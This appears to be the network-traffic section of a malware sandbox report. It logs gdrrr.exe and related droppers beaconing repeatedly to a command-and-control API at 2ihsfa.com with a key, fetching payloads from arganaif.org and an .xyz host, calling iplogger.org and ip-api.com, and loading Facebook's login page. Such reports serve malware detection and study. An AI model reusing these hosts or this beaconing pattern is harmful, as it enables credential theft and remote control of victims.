gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

162.249.67.147:80

fae6d2a1ac2748db.xyz

Setup.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

Setup.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

Setup.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

Setup.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
101.36.107.74:80

md2_2efs.exe

260 B
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
104.26.3.46:443

https://iplogger.org/1F9K57

tls, http

file.exe

1.3kB
14.1kB
21
18

HTTP Request

GET https://iplogger.org/1F9K57

HTTP Response

403
142.250.187.227:80

http://c.pki.goog/r/r4.crl

http

file.exe

556 B
3.8kB
7
5

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
173.212.247.85:443

https://arganaif.org/vendor/tilt/soft.exe

tls, http

file.exe

2.0kB
13.4kB
28
19

HTTP Request

GET https://arganaif.org/vendor/tilt/fw1.php

HTTP Response

404

HTTP Request

GET https://arganaif.org/vendor/tilt/fw2.php

HTTP Response

404

HTTP Request

GET https://arganaif.org/vendor/tilt/fw3.exe

HTTP Response

404

HTTP Request

GET https://arganaif.org/vendor/tilt/fw4.exe

HTTP Response

404

HTTP Request

GET https://arganaif.org/vendor/tilt/fw5.exe

HTTP Response

404

HTTP Request

GET https://arganaif.org/vendor/tilt/soft.exe

HTTP Response

404
104.26.3.46:443

https://iplogger.org/1F7K57

tls, http

file.exe

1.5kB
11.3kB
23
19

HTTP Request

GET https://iplogger.org/1F7K57

HTTP Response

403
104.26.3.46:443

https://iplogger.org/1hh687

tls, http

installer.exe

1.2kB
14.6kB
15
22

HTTP Request

GET https://iplogger.org/1hh687

HTTP Response

403
208.95.112.1:80

http://ip-api.com/json/

http

gdrrr.exe

682 B
598 B
4
3

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
163.70.151.35:443

https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F

tls, http

gdrrr.exe

8.1kB
265.2kB
111
203

HTTP Request

GET https://www.facebook.com/

HTTP Response

302

HTTP Request

GET https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F

HTTP Response

200

HTTP Request

GET https://www.facebook.com/

HTTP Response

302

HTTP Request

GET https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F

HTTP Response

200
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

1.1kB
511 B
7
6

HTTP Request

GET http://uehge4g6gh.2ihsfa.com/api/fbtime

HTTP Response

200

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
162.249.67.147:80

fae6d2a1ac2748db.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
162.249.67.147:80

FAE6D2A1AC2748DB.xyz

6489A2274AE24900.exe

260 B
200 B
5
5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

915 B
212 B
7
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

777 B
172 B
4
4

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
13.248.169.48:80

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

http

gdrrr.exe

869 B
212 B
6
5

HTTP Request

